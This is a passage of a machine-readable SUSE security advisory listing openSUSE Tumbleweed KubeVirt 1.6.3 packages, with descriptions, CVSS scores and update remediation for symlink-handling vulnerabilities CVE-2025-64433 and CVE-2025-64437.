"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-26T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-26T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
